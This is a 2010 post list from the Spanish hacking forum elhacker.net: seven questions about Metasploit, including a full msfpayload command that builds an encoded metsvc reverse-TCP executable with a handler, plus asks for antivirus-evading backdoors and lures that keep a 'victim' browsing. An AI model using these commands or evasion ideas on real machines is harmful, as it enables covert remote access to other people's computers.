elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


  Mostrar Temas
Páginas: [1]
1  Seguridad Informática / Hacking / metsvc en: 6 Mayo 2010, 19:10 pm
Hola de nuevo.
Por mas que lo intento, no consigo establecer una conexion atraves del payload metsvc_reverse_tcp.

Primero me creo un ejecutable con:
./msfpayload windows/metsvc_reverse_tcp LHOST=xx.xx.xx.xx LPORT=4444  R | msfencode -c 2 -t exe -o /root/my.exe

Segundo pongo el metasploit a la escucha con:
use exploit/multi/handler
set PAYLOAD windows/metsvc_reverse_tcp
set LHOST xx.xx.xx.xx
set LPORT
exploit

luego envio el my.exe a un XP, lo ejecuto y el metasploit ni se inmuta.
A que puede ser devido?
Tengo el metasploit actualizado a la ultima revision



2  Seguridad Informática / Hacking / Backdoors en: 30 Abril 2010, 17:27 pm
Una vez conseguida una consola en un pc víctima, que backdoor seria mejor usar para que sea indetectable por los antivirus??
3  Seguridad Informática / Hacking / meterpreter run metsvc en: 8 Abril 2010, 23:54 pm
Después de conseguir un meterpreter, instalo sin problemas el metsvc en el xp victima.
Luego ejecuto en el metasploit el handler con el payload metsvc_bind_tcp y no consigo conectarme al metsvc.
El metsvc esta corriendo en la víctima porque veo el numero de proceso cuando ejecuto
el comando ps
4  Seguridad Informática / Hacking / ftp en: 7 Abril 2010, 18:51 pm
A ver si me explico.
En mi laboratorio de pruebas por una parte  tengo un linux con un servidor vsftp conectado a la wireless de mi tio. Por otra parte, tengo un XP conectado a otra wireless (la de mi abuela), de forma que cuando accedo por ftp desde la linea de comandos al linux puedo entrar como usuario anonimo sin problemas.
Pero cuando desde el linux consigo mediante algun exploit abrir una shell del XP, me conecto a la ftp y no consigo entrar como anonimo.  Alguien sabe porque? ??

saludos
5  Seguridad Informática / Hacking / windows XP 445 en: 1 Abril 2010, 23:21 pm
Es posible explotar el puerto 445 de un Windows XP completamente parcheado y actualizado?
6  Seguridad Informática / Hacking / Redireccionar JavaApplet en: 29 Marzo 2010, 00:47 am
Resulta que estoy haciendo pruebas de pentesting centrandome en la intrusion con JavaApplet a traves de HTML,  y la que mejor me funciona es la que trae la ultima version de metasploit. Y el problema reside en que metasploit te genera un index.html y me gustaria poder modificar este html para poder redireccionar la salida a una web real para que asi la victima pueda seguir navegando.
Es posible o es una ilusion???
7  Seguridad Informática / Hacking / ejecutar payload en windows XP via konsola en: 23 Marzo 2010, 15:13 pm
tengo 2 máquinas virtuales en mi portatil. Uno con BT4 y otro con WINDOWS XP sp3.
Desde el BT4 consigo copiar un meterpreter ejecutable en los ficheros compartidos del windows xp
Pero como consigo entrar via konsola  a los ficheros compartidos del xp y ejecutar el meterpreter???

o igual es imposible?
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines